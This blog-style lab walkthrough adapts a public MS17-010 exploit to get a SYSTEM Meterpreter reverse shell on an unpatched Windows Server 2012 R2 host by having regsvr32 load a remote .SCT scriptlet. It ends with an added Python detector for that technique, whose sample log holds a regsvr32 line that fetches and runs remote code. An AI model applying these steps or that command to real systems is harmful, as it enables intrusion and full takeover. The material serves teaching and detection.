MS17-010 is a vulnerability patched by Microsoft that affects Windows 7 through Windows Server 2016. The EternalRomance/EternalSynergy exploits published by the Shadow Brokers are very unstable when run against Windows Server 2012 and 2016, causing a BSOD on the target machine 100% of the time.
This is not a comprehensive article, but we will demonstrate how to leverage Sleepya's code and make a minimal code change in order to obtain a privileged Windows Meterpreter reverse shell on the target system.
Virtual Environment & prerequisites
Kali/Ubuntu machine, IP address 192.168.1.14
Ps1Encode – used to generate a PowerShell Metasploit reverse shell
Windows Server 2012 R2 target, IP 192.168.1.30 (not patched for MS17-010)
Ok, so without further ado let's compromise the Windows Server 2012 R2 machine.
The exploit was published by sleepya at https://www.exploit-db.com/exploits/42315/. It works without any modification: if we execute it against the Windows Server 2012 R2 machine it creates the file C:\pawned.txt on the target disk.
You might already be thinking "hm, but that doesn't give me a Meterpreter shell on the target box". That is very much true, but a couple of modifications will get us the desired shell.
We first enable the guest account on the Windows Server 2012 R2 machine.
Figure 1: we set the authentication to "guest" with minimal privilege.
The exploit code requires two parameters: the actual target IP address (the Windows Server 2012 R2 machine in our case) and the pipe name. Windows named pipes are not in the scope of this article, but in short the SMB protocol supports three types of shares: a file share, which is a directory tree; a print share, which gives access to printers on the server; and a pipe, which is inter-process communication over a FIFO (first in, first out) channel, a.k.a. a named pipe.
Which other named pipes could potentially be used by the exploit on a Windows server box?
- Netlogon, samr, lsarpc, spoolss, browser
Ok, it's very straightforward to identify which named pipes are available on a target server. I wrote a Python script which compares the UID to identify whether the named pipe exists; if so, it checks whether access is allowed or denied.
Script identifying named pipes on the target Windows Server 2012 R2.
Figure 2: the script identifies the named pipes Browser, Spoolss, Netlogon, LSARPC and SAMR.
If we execute the exploit as published it will create c:\namlook.txt on the target.
Figure 3: the code executed without a reverse shell and created c:\namlook.txt.
Code snippet that creates namlook.txt on the target server.
Figure 4: the CreateFile function adds pwned.txt on the target server, but there is no reverse shell code yet.
Executing the code with our SCT reverse shell (SCT file extension: Windows script component)
This is an effective approach to evade security controls, using the SCT extension with embedded PowerShell reverse shell code. We will use ps1encode, which allows us to generate encoded Metasploit payloads in several formats.
Exploit Modification/Reverse shell
We can download ps1encode from GitHub: https://github.com/CroweCybersecurity/ps1encode
SCT Reverse Shell code
Figure 5: reverse shell code for windows/meterpreter/reverse_tcp.
Armed with the .SCT reverse shell file, we simply move it to our Python web server on the Kali machine (/var/www/html) or to any machine that can be reached from the target server. The idea is that when we execute the exploit against the target server, we use regsvr32 (Microsoft Register Server), the command line utility for registering DLLs in the Windows registry, to load the remote .SCT file.
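The regsvr32 scriptlet trick described above leaves a distinctive trace in process-creation telemetry, which is what a defender should be hunting for. The following Python is an added example, not part of the original post and not Sleepya's exploit code: it scans process-creation records for regsvr32.exe launched with an `/i:` target that is a URL or a `.sct` file, or with scrobj.dll on the command line. The log format, host name and command lines are constructed for the example.

```python
"""Flag regsvr32 scriptlet (.SCT) execution in process-creation logs.

Added defensive example (not from the original post or from the exploit it
discusses). Assumed record format, constructed for this example:
    <timestamp> host=<name> cmd="<full command line>"
"""
import re

# Constructed sample records; the IP and file names are illustrative only.
SAMPLE_LOG = [
    '2017-08-01T10:00:01Z host=SRV2012 cmd="C:\\Windows\\System32\\regsvr32.exe /s /n /u /i:http://192.168.1.14/shell.sct scrobj.dll"',
    '2017-08-01T10:00:02Z host=SRV2012 cmd="C:\\Windows\\System32\\regsvr32.exe /s \\"C:\\Program Files\\Vendor\\vendor.dll\\""',
    '2017-08-01T10:00:03Z host=SRV2012 cmd="C:\\Windows\\System32\\notepad.exe C:\\Users\\admin\\notes.txt"',
    '2017-08-01T10:00:04Z host=SRV2012 cmd="regsvr32 /s /u /i:C:\\Users\\Public\\update.sct scrobj.dll"',
]

LINE_RE = re.compile(r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+cmd="(?P<cmd>.*)"$')
# regsvr32 or regsvr32.exe at the start of the line or after a path separator/space/quote
REGSVR_RE = re.compile(r'(^|[\\/ "])regsvr32(\.exe)?\b', re.IGNORECASE)
# the install argument: /i:<target> or -i:<target>
INSTALL_ARG_RE = re.compile(r'[/-]i:(?P<target>\S+)', re.IGNORECASE)


def parse_line(line):
    """Split one record into timestamp, host and command line; None if malformed."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def classify_regsvr32(cmd):
    """Return the reasons a command line looks like scriptlet abuse (empty if benign)."""
    reasons = []
    if not REGSVR_RE.search(cmd):
        return reasons                      # not regsvr32 at all
    m = INSTALL_ARG_RE.search(cmd)
    if m:
        target = m.group('target').strip('"\'').lower()
        if target.startswith(('http://', 'https://', 'ftp://', '\\\\')):
            reasons.append('remote /i: target')
        if target.endswith('.sct'):
            reasons.append('.sct scriptlet')
    if 'scrobj.dll' in cmd.lower():
        reasons.append('scrobj.dll (scriptlet COM server) on command line')
    return reasons


def scan(lines):
    """Return one finding per record whose command line matches the pattern."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify_regsvr32(rec['cmd'])
        if reasons:
            findings.append({'ts': rec['ts'], 'host': rec['host'],
                             'cmd': rec['cmd'], 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['host']}: {', '.join(f['reasons'])}\n    {f['cmd']}")
```

Of the four constructed records only the two scriptlet invocations are reported; the legitimate `regsvr32 /s <vendor.dll>` registration is left alone because it has neither an `/i:` target that is remote or a `.sct` file nor scrobj.dll on the command line. In a real deployment the same three checks map directly onto Sysmon event 1 or Windows 4688 command-line fields.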
Reverse shell code
Figure 6: we modified the code to execute our malicious .SCT reverse shell on the target machine.
We now configure Metasploit's exploit/multi/handler to receive the reverse shell.
Figure 7: handler configured with windows/meterpreter/reverse_tcp.
After executing the modified MS17-010 exploit we get a clean Meterpreter reverse shell.
Figure 8: sysinfo showing NT AUTHORITY\SYSTEM privileges.
Go and patch, please: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx